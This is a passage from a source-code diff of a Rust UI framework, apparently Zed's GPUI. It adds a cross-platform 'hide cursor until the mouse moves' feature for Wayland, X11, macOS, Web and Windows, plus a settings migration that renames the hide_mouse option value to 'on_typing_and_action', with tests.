Some(cursor_shape_device) = &state.cursor_shape_device { + if let Some(cursor_shape_device) = &state.cursor_shape_device { cursor_shape_device.set_shape(serial, to_shape(style)); } else { let scale = window.primary_output_scale(); @@ -1765,6 +1831,7 @@ impl Dispatch for WaylandClientStatePtr { state.mouse_focused_window = None; state.mouse_location = None; state.button_pressed = None; + state.cursor_hidden_window = None; drop(state); focused_window.handle_input(input); @@ -1780,6 +1847,7 @@ impl Dispatch for WaylandClientStatePtr { return; } state.mouse_location = Some(point(px(surface_x as f32), px(surface_y as f32))); + state.restore_cursor_after_hide(); if let 
Some(window) = state.mouse_focused_window.clone() { if window.is_blocked() { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index 03272a99051aa7..bedd3c3e2973e0 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ b/crates/gpui_linux/src/linux/x11/client.rs @@ -211,6 +211,8 @@ pub struct X11ClientState { pub(crate) cursor_handle: cursor::Handle, pub(crate) cursor_styles: HashMap, pub(crate) cursor_cache: HashMap>, + pub(crate) invisible_cursor_cache: Option, + pub(crate) cursor_hidden_window: Option, pointer_device_states: BTreeMap, @@ -249,6 +251,9 @@ impl X11ClientStatePtr { if state.keyboard_focused_window == Some(x_window) { state.keyboard_focused_window = None; } + if state.cursor_hidden_window == Some(x_window) { + state.cursor_hidden_window = None; + } state.cursor_styles.remove(&x_window); } @@ -543,6 +548,8 @@ impl X11Client { cursor_handle, cursor_styles: HashMap::default(), cursor_cache: HashMap::default(), + cursor_hidden_window: None, + invisible_cursor_cache: None, pointer_device_states, @@ -971,6 +978,7 @@ impl X11Client { compose_state.reset(); } state.pre_edit_text.take(); + state.restore_cursor_after_hide(); drop(state); self.reset_ime(); window.handle_ime_delete(); @@ -1224,6 +1232,7 @@ impl X11Client { Event::XinputMotion(event) => { let window = self.get_window(event.event)?; let mut state = self.0.borrow_mut(); + state.restore_cursor_after_hide(); if window.is_blocked() { // We want to set the cursor to the default arrow // when the window is blocked @@ -1286,6 +1295,7 @@ impl X11Client { window.set_hovered(true); let mut state = self.0.borrow_mut(); state.mouse_focused_window = Some(event.event); + state.restore_cursor_after_hide(); } Event::XinputLeave(event) if event.mode == xinput::NotifyMode::NORMAL => { let mut state = self.0.borrow_mut(); @@ -1667,11 +1677,17 @@ impl LinuxClient for X11Client { return; } + state.cursor_styles.insert(focused_window, style); + + // Don't clobber 
the invisible cursor; restore reads back from `cursor_styles`. + if state.cursor_hidden_window == Some(focused_window) { + return; + } + let Some(cursor) = state.get_cursor_icon(style) else { return; }; - state.cursor_styles.insert(focused_window, style); check_reply( || "Failed to set cursor style", state.xcb_connection.change_window_attributes( @@ -1686,6 +1702,14 @@ impl LinuxClient for X11Client { state.xcb_connection.flush().log_err(); } + fn hide_cursor_until_mouse_moves(&self) { + self.0.borrow_mut().hide_cursor_until_mouse_moves(); + } + + fn is_cursor_visible(&self) -> bool { + self.0.borrow().cursor_hidden_window.is_none() + } + fn open_uri(&self, uri: &str) { #[cfg(any(feature = "wayland", feature = "x11"))] open_uri_internal( @@ -1986,42 +2010,34 @@ impl X11ClientState { return *cursor; } - let result; - match style { - CursorStyle::None => match create_invisible_cursor(&self.xcb_connection) { - Ok(loaded_cursor) => result = Ok(loaded_cursor), - Err(err) => result = Err(err.context("X11: error while creating invisible cursor")), - }, - _ => 'outer: { - let mut errors = String::new(); - let cursor_icon_names = cursor_style_to_icon_names(style); - for cursor_icon_name in cursor_icon_names { - match self - .cursor_handle - .load_cursor(&self.xcb_connection, cursor_icon_name) - { - Ok(loaded_cursor) => { - if loaded_cursor != x11rb::NONE { - result = Ok(loaded_cursor); - break 'outer; - } - } - Err(err) => { - errors.push_str(&err.to_string()); - errors.push('\n'); + let result = 'outer: { + let mut errors = String::new(); + let cursor_icon_names = cursor_style_to_icon_names(style); + for cursor_icon_name in cursor_icon_names { + match self + .cursor_handle + .load_cursor(&self.xcb_connection, cursor_icon_name) + { + Ok(loaded_cursor) => { + if loaded_cursor != x11rb::NONE { + break 'outer Ok(loaded_cursor); } } - } - if errors.is_empty() { - result = Err(anyhow!( - "errors while loading cursor icons {:?}:\n{}", - cursor_icon_names, - errors - )); - } else 
{ - result = Err(anyhow!("did not find cursor icons {:?}", cursor_icon_names)); + Err(err) => { + errors.push_str(&err.to_string()); + errors.push('\n'); + } } } + if errors.is_empty() { + Err(anyhow!( + "errors while loading cursor icons {:?}:\n{}", + cursor_icon_names, + errors + )) + } else { + Err(anyhow!("did not find cursor icons {:?}", cursor_icon_names)) + } }; let cursor = match result { @@ -2052,6 +2068,73 @@ impl X11ClientState { self.cursor_cache.insert(style, cursor); cursor } + + fn get_or_create_invisible_cursor(&mut self) -> Option { + if let Some(cursor) = self.invisible_cursor_cache { + return Some(cursor); + } + let cursor = create_invisible_cursor(&self.xcb_connection) + .context("X11: error while creating invisible cursor") + .log_err()?; + self.invisible_cursor_cache = Some(cursor); + Some(cursor) + } + + fn hide_cursor_until_mouse_moves(&mut self) { + if self.cursor_hidden_window.is_some() { + return; + } + let Some(focused_window) = self.mouse_focused_window else { + // No window to apply the per-window invisible cursor to. 
+ return; + }; + let Some(invisible_cursor) = self.get_or_create_invisible_cursor() else { + return; + }; + check_reply( + || "Failed to hide cursor", + self.xcb_connection.change_window_attributes( + focused_window, + &ChangeWindowAttributesAux { + cursor: Some(invisible_cursor), + ..Default::default() + }, + ), + ) + .log_err(); + self.xcb_connection.flush().log_err(); + self.cursor_hidden_window = Some(focused_window); + } + + fn restore_cursor_after_hide(&mut self) { + let Some(hidden_window) = self.cursor_hidden_window.take() else { + return; + }; + let style = self + .cursor_styles + .get(&hidden_window) + .copied() + .unwrap_or(CursorStyle::Arrow); + let Some(cursor) = self.get_cursor_icon(style) else { + log::warn!( + "X11: no cursor icon available to restore {:?} after hide; cursor may stay invisible", + style + ); + return; + }; + check_reply( + || "Failed to restore cursor style after hide", + self.xcb_connection.change_window_attributes( + hidden_window, + &ChangeWindowAttributesAux { + cursor: Some(cursor), + ..Default::default() + }, + ), + ) + .log_err(); + self.xcb_connection.flush().log_err(); + } } // Adapted from: diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index fefe957bb25bad..77cf85a8d1d340 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -52,7 +52,10 @@ use std::{ ptr, rc::Rc, slice, str, - sync::{Arc, OnceLock, atomic::AtomicBool}, + sync::{ + Arc, OnceLock, + atomic::{AtomicBool, Ordering}, + }, }; use util::{ ResultExt, @@ -179,7 +182,8 @@ pub(crate) struct MacPlatformState { dock_menu: Option, menus: Option>, keyboard_mapper: Rc, - cursor_hidden: Arc, + /// Mirrors `[NSCursor setHiddenUntilMouseMoves:]` state, which AppKit doesn't expose. 
+ cursor_visible: Arc, } impl MacPlatform { @@ -216,7 +220,7 @@ impl MacPlatform { on_thermal_state_change: None, menus: None, keyboard_mapper, - cursor_hidden: Arc::new(AtomicBool::new(false)), + cursor_visible: Arc::new(AtomicBool::new(true)), })) } @@ -621,10 +625,10 @@ impl Platform for MacPlatform { handle: AnyWindowHandle, options: WindowParams, ) -> Result> { - let (cursor_hidden, foreground_executor, background_executor, renderer_context) = { + let (cursor_visible, foreground_executor, background_executor, renderer_context) = { let guard = self.0.lock(); ( - guard.cursor_hidden.clone(), + guard.cursor_visible.clone(), guard.foreground_executor.clone(), guard.background_executor.clone(), guard.renderer_context.clone(), @@ -634,7 +638,7 @@ impl Platform for MacPlatform { Ok(Box::new(MacWindow::open( handle, options, - cursor_hidden, + cursor_visible, foreground_executor, background_executor, renderer_context, @@ -991,12 +995,25 @@ impl Platform for MacPlatform { /// Match cursor style to one of the styles available /// in macOS's [NSCursor](https://developer.apple.com/documentation/appkit/nscursor). 
fn set_cursor_style(&self, style: CursorStyle) { - let cursor_hidden = self.0.lock().cursor_hidden.clone(); unsafe { - set_active_window_cursor_style(style, &cursor_hidden); + set_active_window_cursor_style(style); + } + } + + fn hide_cursor_until_mouse_moves(&self) { + let cursor_visible = self.0.lock().cursor_visible.clone(); + if !cursor_visible.swap(false, Ordering::Relaxed) { + return; + } + unsafe { + let _: () = msg_send![class!(NSCursor), setHiddenUntilMouseMoves: YES]; } } + fn is_cursor_visible(&self) -> bool { + self.0.lock().cursor_visible.load(Ordering::Relaxed) + } + fn should_auto_hide_scrollbars(&self) -> bool { #[allow(non_upper_case_globals)] const NSScrollerStyleOverlay: NSInteger = 1; diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index 2ab4b52d8d8ace..8e7fcb154cf513 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -324,10 +324,7 @@ pub(crate) fn convert_mouse_position(position: NSPoint, window_height: Pixels) - /// This function is not thread safe. Callers must ensure this is called on the AppKit main /// thread because it reads the active AppKit window and updates GPUI window state associated /// with Objective-C objects. -pub(crate) unsafe fn set_active_window_cursor_style( - style: CursorStyle, - cursor_hidden: &AtomicBool, -) { +pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { // SAFETY: The caller guarantees AppKit main-thread access. The class check ensures the // window has our WINDOW_STATE_IVAR before reading it. unsafe { @@ -345,9 +342,6 @@ pub(crate) unsafe fn set_active_window_cursor_style( }; let Some(active_window) = active_window else { - if !matches!(style, CursorStyle::None) { - unhide_cursor(cursor_hidden); - } return; }; @@ -363,22 +357,6 @@ pub(crate) unsafe fn set_active_window_cursor_style( } } -/// Unhides the cursor if this GPUI platform instance has hidden it. 
-/// -/// # Safety -/// -/// Must be called on the AppKit main thread. -unsafe fn unhide_cursor(cursor_hidden: &AtomicBool) { - unsafe { - if cursor_hidden - .compare_exchange(true, false, Ordering::Relaxed, Ordering::Relaxed) - .is_ok() - { - let _: () = msg_send![class!(NSCursor), unhide]; - } - } -} - unsafe fn build_window_class(name: &'static str, superclass: &Class) -> *const Class { unsafe { let mut decl = ClassDecl::new(name, superclass).unwrap(); @@ -496,7 +474,7 @@ struct MacWindowState { blurred_view: Option, background_appearance: WindowBackgroundAppearance, cursor_style: CursorStyle, - cursor_hidden: Arc, + cursor_visible: Arc, display_link: Option, renderer: renderer::Renderer, request_frame_callback: Option>, @@ -698,7 +676,7 @@ impl MacWindow { tabbing_identifier, .. }: WindowParams, - cursor_hidden: Arc, + cursor_visible: Arc, foreground_executor: ForegroundExecutor, background_executor: BackgroundExecutor, renderer_context: renderer::Context, @@ -816,7 +794,7 @@ impl MacWindow { blurred_view: None, background_appearance: WindowBackgroundAppearance::Opaque, cursor_style: CursorStyle::Arrow, - cursor_hidden, + cursor_visible, display_link: None, renderer: renderer::new_renderer( renderer_context, @@ -1850,26 +1828,7 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { let _: () = msg_send![super(this, class!(NSView)), resetCursorRects]; let window_state = get_window_state(this); - let cursor_style; - let cursor_hidden; - - { - let window_state = window_state.lock(); - - if matches!(window_state.cursor_style, CursorStyle::None) { - if window_state - .cursor_hidden - .compare_exchange(false, true, Ordering::Relaxed, Ordering::Relaxed) - .is_ok() - { - let _: () = msg_send![class!(NSCursor), hide]; - } - return; - } - - cursor_style = window_state.cursor_style; - cursor_hidden = window_state.cursor_hidden.clone(); - }; + let cursor_style = window_state.lock().cursor_style; let cursor: id = match cursor_style { CursorStyle::Arrow => 
msg_send![class!(NSCursor), arrowCursor], @@ -1905,11 +1864,8 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { CursorStyle::DragLink => msg_send![class!(NSCursor), dragLinkCursor], CursorStyle::DragCopy => msg_send![class!(NSCursor), dragCopyCursor], CursorStyle::ContextualMenu => msg_send![class!(NSCursor), contextualMenuCursor], - CursorStyle::None => unreachable!(), }; - unhide_cursor(&cursor_hidden); - let bounds = NSView::bounds(this as *const Object as id); let _: () = msg_send![this, addCursorRect: bounds cursor: cursor]; } @@ -2140,6 +2096,20 @@ extern "C" fn handle_view_event(this: &Object, _: Sel, native_event: id) { let event = unsafe { platform_input_from_native(native_event, Some(window_height)) }; if let Some(mut event) = event { + // AppKit unhides the cursor on the next mouse movement; mirror that here. + if matches!( + event, + PlatformInput::MouseMove(_) + | PlatformInput::MouseDown(_) + | PlatformInput::MouseUp(_) + | PlatformInput::MousePressure(_) + | PlatformInput::MouseExited(_) + | PlatformInput::ScrollWheel(_) + | PlatformInput::Pinch(_) + ) { + lock.cursor_visible.store(true, Ordering::Relaxed); + } + match &mut event { PlatformInput::MouseDown( event @ MouseDownEvent { @@ -2365,6 +2335,9 @@ extern "C" fn window_did_change_key_status(this: &Object, selector: Sel, _: id) let lock = window_state.lock(); let is_active = unsafe { lock.native_window.isKeyWindow() == YES }; + // AppKit also unhides the cursor on activation changes, so mirror that here. + lock.cursor_visible.store(true, Ordering::Relaxed); + // When opening a pop-up while the application isn't active, Cocoa sends a spurious // `windowDidBecomeKey` message to the previous key window even though that window // isn't actually key. 
This causes a bug if the application is later activated while diff --git a/crates/gpui_macros/src/styles.rs b/crates/gpui_macros/src/styles.rs index 133c9fdebec06b..fdbc64f623a474 100644 --- a/crates/gpui_macros/src/styles.rs +++ b/crates/gpui_macros/src/styles.rs @@ -327,12 +327,6 @@ pub fn cursor_style_methods(input: TokenStream) -> TokenStream { self } - /// Sets cursor style when hovering over an element to `none`. - /// [Docs](https://tailwindcss.com/docs/cursor) - #visibility fn cursor_none(mut self, cursor: CursorStyle) -> Self { - self.style().mouse_cursor = Some(gpui::CursorStyle::None); - self - } }; output.into() diff --git a/crates/gpui_web/src/platform.rs b/crates/gpui_web/src/platform.rs index 4d78b71aa05b74..290ef33e5f1faa 100644 --- a/crates/gpui_web/src/platform.rs +++ b/crates/gpui_web/src/platform.rs @@ -13,11 +13,12 @@ use gpui::{ use gpui_wgpu::WgpuContext; use std::{ borrow::Cow, - cell::RefCell, + cell::{Cell, RefCell}, path::{Path, PathBuf}, rc::Rc, sync::Arc, }; +use wasm_bindgen::prelude::*; static BUNDLED_FONTS: &[&[u8]] = &[ include_bytes!("../../../assets/fonts/ibm-plex-sans/IBMPlexSans-Regular.ttf"), @@ -39,6 +40,9 @@ pub struct WebPlatform { active_display: Rc, callbacks: RefCell, wgpu_context: Rc>>, + cursor_visible: Rc>, + last_cursor_css: Rc>, + _cursor_restore_listeners: Vec, } #[derive(Default)] @@ -77,6 +81,14 @@ impl WebPlatform { let active_display: Rc = Rc::new(WebDisplay::new(browser_window.clone())); + let cursor_visible = Rc::new(Cell::new(true)); + let last_cursor_css = Rc::new(Cell::new("default")); + let cursor_restore_listeners = cursor_restore_listeners( + &browser_window, + cursor_visible.clone(), + last_cursor_css.clone(), + ); + Self { browser_window, background_executor, @@ -86,6 +98,9 @@ impl WebPlatform { active_display, callbacks: RefCell::new(WebPlatformCallbacks::default()), wgpu_context: Rc::new(RefCell::new(None)), + cursor_visible, + last_cursor_css, + _cursor_restore_listeners: cursor_restore_listeners, } 
} } @@ -292,18 +307,25 @@ impl Platform for WebPlatform { CursorStyle::DragLink => "alias", CursorStyle::DragCopy => "copy", CursorStyle::ContextualMenu => "context-menu", - CursorStyle::None => "none", }; - if let Some(document) = self.browser_window.document() { - if let Some(body) = document.body() { - if let Err(error) = body.style().set_property("cursor", css_cursor) { - log::warn!("Failed to set cursor style: {error:?}"); - } - } + self.last_cursor_css.set(css_cursor); + if self.cursor_visible.get() { + set_body_cursor(&self.browser_window, css_cursor); } } + fn hide_cursor_until_mouse_moves(&self) { + if !self.cursor_visible.replace(false) { + return; + } + set_body_cursor(&self.browser_window, "none"); + } + + fn is_cursor_visible(&self) -> bool { + self.cursor_visible.get() + } + fn should_auto_hide_scrollbars(&self) -> bool { true } @@ -342,3 +364,72 @@ impl Platform for WebPlatform { self.callbacks.borrow_mut().keyboard_layout_change = Some(callback); } } + +struct EventListenerHandle { + target: web_sys::EventTarget, + event_name: &'static str, + closure: Closure, +} + +impl Drop for EventListenerHandle { + fn drop(&mut self) { + self.target + .remove_event_listener_with_callback( + self.event_name, + self.closure.as_ref().unchecked_ref(), + ) + .ok(); + } +} + +fn cursor_restore_listeners( + browser_window: &web_sys::Window, + cursor_visible: Rc>, + last_cursor_css: Rc>, +) -> Vec { + let mut handles = Vec::new(); + let Some(document) = browser_window.document() else { + return handles; + }; + + let make_restore_handler = |browser_window: web_sys::Window| { + let cursor_visible = cursor_visible.clone(); + let last_cursor_css = last_cursor_css.clone(); + Closure::::new(move |_event: JsValue| { + if !cursor_visible.replace(true) { + set_body_cursor(&browser_window, last_cursor_css.get()); + } + }) + }; + + let mut add_listener = |target: &web_sys::EventTarget, event_name: &'static str| { + let closure = make_restore_handler(browser_window.clone()); + 
target + .add_event_listener_with_callback(event_name, closure.as_ref().unchecked_ref()) + .ok(); + handles.push(EventListenerHandle { + target: target.clone(), + event_name, + closure, + }); + }; + + let document_target: &web_sys::EventTarget = document.as_ref(); + let window_target: &web_sys::EventTarget = browser_window.as_ref(); + + add_listener(document_target, "mousemove"); + add_listener(document_target, "mouseenter"); + add_listener(window_target, "blur"); + add_listener(document_target, "visibilitychange"); + + handles +} + +fn set_body_cursor(browser_window: &web_sys::Window, css_cursor: &str) { + if let Some(document) = browser_window.document() + && let Some(body) = document.body() + && let Err(error) = body.style().set_property("cursor", css_cursor) + { + log::warn!("Failed to set cursor style: {error:?}"); + } +} diff --git a/crates/gpui_windows/src/events.rs b/crates/gpui_windows/src/events.rs index 23b0c078b8ae62..370582e83b5a5f 100644 --- a/crates/gpui_windows/src/events.rs +++ b/crates/gpui_windows/src/events.rs @@ -1,4 +1,4 @@ -use std::rc::Rc; +use std::{rc::Rc, sync::atomic::Ordering}; use ::util::ResultExt; use anyhow::Context as _; @@ -297,6 +297,7 @@ impl WindowsWindowInner { fn handle_mouse_move_msg(&self, handle: HWND, lparam: LPARAM, wparam: WPARAM) -> Option { self.start_tracking_mouse(handle, TME_LEAVE); + self.restore_cursor_after_hide(); let Some(mut func) = self.state.callbacks.input.take() else { return Some(1); @@ -330,6 +331,9 @@ impl WindowsWindowInner { fn handle_mouse_leave_msg(&self) -> Option { self.state.hovered.set(false); + // The next window's `WM_SETCURSOR` picks its own cursor, so we just clear + // the flag for tight `is_cursor_visible()` semantics. 
+ self.state.cursor_visible.store(true, Ordering::Relaxed); if let Some(mut callback) = self.state.callbacks.hovered_status_change.take() { callback(false); self.state @@ -726,6 +730,10 @@ impl WindowsWindowInner { let activated = wparam.loword() > 0; let this = self.clone(); + if !activated { + this.state.cursor_visible.store(true, Ordering::Relaxed); + } + // When the window is activated (gains focus), reset the modifier tracking state. // This fixes the issue where Alt-Tab away and back leaves stale modifier state // (especially the Alt key) because Windows doesn't always send key-up events to @@ -915,6 +923,7 @@ impl WindowsWindowInner { fn handle_nc_mouse_move_msg(&self, handle: HWND, lparam: LPARAM) -> Option { self.start_tracking_mouse(handle, TME_LEAVE | TME_NONCLIENT); + self.restore_cursor_after_hide(); let mut func = self.state.callbacks.input.take()?; let scale_factor = self.state.scale_factor.get(); @@ -1078,8 +1087,13 @@ impl WindowsWindowInner { { return None; } + let cursor = if self.state.cursor_visible.load(Ordering::Relaxed) { + self.state.current_cursor.get() + } else { + None + }; unsafe { - SetCursor(self.state.current_cursor.get()); + SetCursor(cursor); }; Some(0) } @@ -1233,6 +1247,15 @@ impl WindowsWindowInner { } } + /// Clear the hidden flag and restore the cursor immediately + fn restore_cursor_after_hide(&self) { + if !self.state.cursor_visible.swap(true, Ordering::Relaxed) { + unsafe { + SetCursor(self.state.current_cursor.get()); + } + } + } + fn start_tracking_mouse(&self, handle: HWND, flags: TRACKMOUSEEVENT_FLAGS) { if !self.state.hovered.get() { self.state.hovered.set(true); diff --git a/crates/gpui_windows/src/platform.rs b/crates/gpui_windows/src/platform.rs index 4c2898256212a7..7b76c4d12a8980 100644 --- a/crates/gpui_windows/src/platform.rs +++ b/crates/gpui_windows/src/platform.rs @@ -63,6 +63,8 @@ pub(crate) struct WindowsPlatformState { jump_list: RefCell, // NOTE: standard cursor handles don't need to close. 
pub(crate) current_cursor: Cell>, + /// Shared with each window so `WM_SETCURSOR` can read it directly. + pub(crate) cursor_visible: Arc, directx_devices: RefCell>, } @@ -87,6 +89,7 @@ impl WindowsPlatformState { callbacks, jump_list: RefCell::new(jump_list), current_cursor: Cell::new(current_cursor), + cursor_visible: Arc::new(AtomicBool::new(true)), directx_devices: RefCell::new(directx_devices), menus: RefCell::new(Vec::new()), } @@ -219,6 +222,7 @@ impl WindowsPlatform { icon: self.icon, executor: self.foreground_executor.clone(), current_cursor: self.inner.state.current_cursor.get(), + cursor_visible: self.inner.state.cursor_visible.clone(), drop_target_helper: self.drop_target_helper.clone().unwrap(), validation_number: self.inner.validation_number, main_receiver: self.inner.main_receiver.clone(), @@ -682,6 +686,31 @@ impl Platform for WindowsPlatform { } } + fn hide_cursor_until_mouse_moves(&self) { + if !self + .inner + .state + .cursor_visible + .swap(false, Ordering::Relaxed) + { + return; + } + + for handle in self.raw_window_handles.read().iter() { + let Some(window) = window_from_hwnd(handle.as_raw()) else { + continue; + }; + if window.state.hovered.get() { + unsafe { SetCursor(None) }; + break; + } + } + } + + fn is_cursor_visible(&self) -> bool { + self.inner.state.cursor_visible.load(Ordering::Relaxed) + } + fn should_auto_hide_scrollbars(&self) -> bool { should_auto_hide_scrollbars().log_err().unwrap_or(false) } @@ -1015,6 +1044,7 @@ pub(crate) struct WindowCreationInfo { pub(crate) icon: HICON, pub(crate) executor: ForegroundExecutor, pub(crate) current_cursor: Option, + pub(crate) cursor_visible: Arc, pub(crate) drop_target_helper: IDropTargetHelper, pub(crate) validation_number: usize, pub(crate) main_receiver: PriorityQueueReceiver, diff --git a/crates/gpui_windows/src/util.rs b/crates/gpui_windows/src/util.rs index fe5093dede385c..15dd4c69984d14 100644 --- a/crates/gpui_windows/src/util.rs +++ b/crates/gpui_windows/src/util.rs @@ -115,7 
+115,6 @@ pub(crate) fn load_cursor(style: CursorStyle) -> Option { CursorStyle::ResizeUpLeftDownRight => (&SIZENWSE, IDC_SIZENWSE), CursorStyle::ResizeUpRightDownLeft => (&SIZENESW, IDC_SIZENESW), CursorStyle::OperationNotAllowed => (&NO, IDC_NO), - CursorStyle::None => return None, _ => (&ARROW, IDC_ARROW), }; Some( diff --git a/crates/gpui_windows/src/window.rs b/crates/gpui_windows/src/window.rs index f655c1989e2c69..2fd7c3c6461dd5 100644 --- a/crates/gpui_windows/src/window.rs +++ b/crates/gpui_windows/src/window.rs @@ -66,6 +66,8 @@ pub struct WindowsWindowState { pub click_state: ClickState, pub current_cursor: Cell>, + /// Shared with [`WindowsPlatformState::cursor_visible`]. + pub cursor_visible: Arc, pub nc_button_pressed: Cell>, pub display: Cell, @@ -98,6 +100,7 @@ impl WindowsWindowState { directx_devices: &DirectXDevices, window_params: &CREATESTRUCTW, current_cursor: Option, + cursor_visible: Arc, display: WindowsDisplay, min_size: Option>, appearance: WindowAppearance, @@ -158,6 +161,7 @@ impl WindowsWindowState { renderer: RefCell::new(renderer), click_state, current_cursor: Cell::new(current_cursor), + cursor_visible, nc_button_pressed: Cell::new(nc_button_pressed), display: Cell::new(display), fullscreen: Cell::new(fullscreen), @@ -234,6 +238,7 @@ impl WindowsWindowInner { &context.directx_devices, cs, context.current_cursor, + context.cursor_visible.clone(), context.display, context.min_size, context.appearance, @@ -373,6 +378,7 @@ struct WindowCreateContext { min_size: Option>, executor: ForegroundExecutor, current_cursor: Option, + cursor_visible: Arc, drop_target_helper: IDropTargetHelper, validation_number: usize, main_receiver: PriorityQueueReceiver, @@ -394,6 +400,7 @@ impl WindowsWindow { icon, executor, current_cursor, + cursor_visible, drop_target_helper, validation_number, main_receiver, @@ -473,6 +480,7 @@ impl WindowsWindow { min_size: params.window_min_size, executor, current_cursor, + cursor_visible, drop_target_helper, 
validation_number, main_receiver, diff --git a/crates/migrator/src/migrations.rs b/crates/migrator/src/migrations.rs index 8fa8907a16cc48..394b26f57ab3f0 100644 --- a/crates/migrator/src/migrations.rs +++ b/crates/migrator/src/migrations.rs @@ -358,3 +358,9 @@ pub(crate) mod m_2026_04_17 { pub(crate) use settings::promote_show_branch_icon_true_to_show_branch_status_icon; } + +pub(crate) mod m_2026_05_04 { + mod settings; + + pub(crate) use settings::SETTINGS_PATTERNS; +} diff --git a/crates/migrator/src/migrations/m_2026_05_04/settings.rs b/crates/migrator/src/migrations/m_2026_05_04/settings.rs new file mode 100644 index 00000000000000..a2a705e03f42e7 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_05_04/settings.rs @@ -0,0 +1,38 @@ +use std::ops::Range; +use tree_sitter::{Query, QueryMatch}; + +use crate::MigrationPatterns; +use crate::patterns::SETTINGS_ROOT_KEY_VALUE_PATTERN; + +pub const SETTINGS_PATTERNS: MigrationPatterns = + &[(SETTINGS_ROOT_KEY_VALUE_PATTERN, replace_setting_value)]; + +fn replace_setting_value( + contents: &str, + mat: &QueryMatch, + query: &Query, +) -> Option<(Range, String)> { + let setting_capture_ix = query.capture_index_for_name("name")?; + let setting_name_range = mat + .nodes_for_capture_index(setting_capture_ix) + .next()? + .byte_range(); + let setting_name = contents.get(setting_name_range)?; + + if setting_name != "hide_mouse" { + return None; + } + + let value_capture_ix = query.capture_index_for_name("value")?; + let value_range = mat + .nodes_for_capture_index(value_capture_ix) + .next()? 
+ .byte_range(); + let value = contents.get(value_range.clone())?; + + if value.trim() != "\"on_typing_and_movement\"" { + return None; + } + + Some((value_range, "\"on_typing_and_action\"".to_string())) +} diff --git a/crates/migrator/src/migrator.rs b/crates/migrator/src/migrator.rs index ac7e4e337ed946..e1b15d98ea528d 100644 --- a/crates/migrator/src/migrator.rs +++ b/crates/migrator/src/migrator.rs @@ -253,6 +253,10 @@ pub fn migrate_settings(text: &str) -> Result> { MigrationType::Json( migrations::m_2026_04_17::promote_show_branch_icon_true_to_show_branch_status_icon, ), + MigrationType::TreeSitter( + migrations::m_2026_05_04::SETTINGS_PATTERNS, + &SETTINGS_QUERY_2026_05_04, + ), ]; run_migrations(text, migrations) } @@ -395,6 +399,10 @@ define_query!( KEYMAP_QUERY_2026_03_23, migrations::m_2026_03_23::KEYMAP_PATTERNS ); +define_query!( + SETTINGS_QUERY_2026_05_04, + migrations::m_2026_05_04::SETTINGS_PATTERNS +); // custom query static EDIT_PREDICTION_SETTINGS_MIGRATION_QUERY: LazyLock = LazyLock::new(|| { @@ -5346,6 +5354,42 @@ mod tests { ); } + #[test] + fn test_rename_hide_mouse_on_typing_and_movement_to_on_typing_and_action() { + assert_migrate_settings( + r#" + { + "hide_mouse": "on_typing_and_movement" + } + "#, + Some( + r#" + { + "hide_mouse": "on_typing_and_action" + } + "#, + ), + ); + } + + #[test] + fn test_chain_hide_mouse_while_typing_to_on_typing_and_action() { + assert_migrate_settings( + r#" + { + "hide_mouse_while_typing": true + } + "#, + Some( + r#" + { + "hide_mouse": "on_typing_and_action" + } + "#, + ), + ); + } + #[test] fn test_promote_show_branch_icon_true_to_show_branch_status_icon_no_change_when_already_migrated() { diff --git a/crates/settings/src/vscode_import.rs b/crates/settings/src/vscode_import.rs index 64f00bc5d6501b..db7f847b23417f 100644 --- a/crates/settings/src/vscode_import.rs +++ b/crates/settings/src/vscode_import.rs @@ -192,6 +192,7 @@ impl VsCodeSettings { ..GlobalLspSettingsContent::default() }), helix_mode: 
None, + hide_mouse: None, image_viewer: None, journal: None, language_models: None, @@ -267,7 +268,6 @@ impl VsCodeSettings { go_to_definition_fallback: None, go_to_definition_scroll_strategy: None, gutter: self.gutter_content(), - hide_mouse: None, horizontal_scroll_margin: None, hover_popover_delay: self.read_u64("editor.hover.delay").map(Into::into), hover_popover_enabled: self.read_bool("editor.hover.enabled"), diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 5c0dd939688326..6a36d0c524a6f7 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -22,10 +22,6 @@ pub struct EditorSettingsContent { /// /// Default: bar pub cursor_shape: Option, - /// Determines when the mouse cursor should be hidden in an editor or input box. - /// - /// Default: on_typing_and_movement - pub hide_mouse: Option, /// Determines how snippets are sorted relative to other completion items. /// /// Default: inline @@ -836,34 +832,6 @@ pub enum GoToDefinitionScrollStrategy { Preserve, } -/// Determines when the mouse cursor should be hidden in an editor or input box. -/// -/// Default: on_typing_and_movement -#[derive( - Copy, - Clone, - Debug, - Default, - Serialize, - Deserialize, - PartialEq, - Eq, - JsonSchema, - MergeFrom, - strum::VariantArray, - strum::VariantNames, -)] -#[serde(rename_all = "snake_case")] -pub enum HideMouseMode { - /// Never hide the mouse cursor - Never, - /// Hide only when typing - OnTyping, - /// Hide on both typing and cursor movement - #[default] - OnTypingAndMovement, -} - /// Determines how snippets are sorted relative to other completion items. 
/// /// Default: inline diff --git a/crates/settings_content/src/settings_content.rs b/crates/settings_content/src/settings_content.rs index 251718d146506f..02fe409c6325af 100644 --- a/crates/settings_content/src/settings_content.rs +++ b/crates/settings_content/src/settings_content.rs @@ -82,6 +82,35 @@ pub enum ParseStatus { Failed { error: String }, } +/// Determines when the mouse cursor should be hidden in response to keyboard +/// input. +/// +/// Default: on_typing_and_action +#[derive( + Copy, + Clone, + Debug, + Default, + Serialize, + Deserialize, + PartialEq, + Eq, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum HideMouseMode { + /// Never hide the mouse cursor + Never, + /// Hide only when typing + OnTyping, + /// Hide on typing and on key bindings that resolve to an action + #[default] + OnTypingAndAction, +} + #[with_fallible_options] #[derive(Debug, PartialEq, Default, Clone, Serialize, Deserialize, JsonSchema, MergeFrom)] pub struct 